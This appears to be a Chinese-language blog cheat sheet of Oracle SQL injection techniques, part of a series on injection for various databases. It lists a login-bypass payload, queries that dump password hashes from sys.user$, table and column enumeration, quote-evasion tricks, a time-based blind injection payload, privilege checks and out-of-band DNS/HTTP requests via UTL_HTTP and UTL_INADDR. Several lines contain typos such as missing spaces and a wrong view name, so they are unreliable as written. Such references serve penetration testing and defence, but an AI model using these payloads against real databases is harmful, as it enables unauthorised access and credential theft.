默认数据库
SYSTEM |
SYSAUX |
注释
--
SELECT * FROM Users WHERE username = '' OR1=1 --' AND password = '';
查询版本信息
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; |
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; |
SELECT version FROM v$instance; |
数据库凭证
SELECT username FROM all_users; | 支持所有版本 |
SELECT name, password from sys.user$; | 高权限, <= 10g |
SELECT name, spare4 from sys.user$; | 高权限, <= 11g |
查询数据库信息
查询当前库
SELECT name FROM v$database; |
SELECT instance_name FROM v$instance |
SELECT global_name FROM global_name |
SELECT SYS.DATABASE_NAME FROM DUAL |
用户数据库
SELECT DISTINCT owner FROM all_tables; |
主机名称
SELECT host_name FROM v$instance; (Privileged) |
SELECT UTL_INADDR.get_host_name FROM dual; |
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; |
SELECT UTL_INADDR.get_host_address FROM dual; |
查询表和列
查询表
SELECT table_name FROM all_tables; |
查询列
SELECT column_name FROMall_tab_columns;
从列中查询表
SELECT column_name FROM all_tab_columns WHEREtable_name = 'Users';
从表中查询列
SELECT table_name FROMall_tab_tables WHERE column_name = 'password';
查询多个表信息
SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables; |
避免使用引号
SELECT 0x09120911091 FROM dual; | Hex编码 |
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; | CHR() 函数 |
字符串拼接
SELECT 'a'||'d'||'mi'||'n' FROM dual; |
条件语句
SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual |
时间注入
SELECTUTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
AND (SELECT COUNT(*) FROM all_users t1, all_userst2, all_users t3, all_users t4, all_users t5) > 0 AND 300 >ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
查询权限
SELECT privilege FROM session_privs; |
SELECT grantee, granted_role FROM dba_role_privs; (Privileged) |
DNS带外
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; |
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual; |
同类型文章赏析
数据库的一些注入技巧-sqlserver
数据库的一些注入技巧-mysql
全文pdf下载地址:
https://www.chinabaiker.com/sql.pdf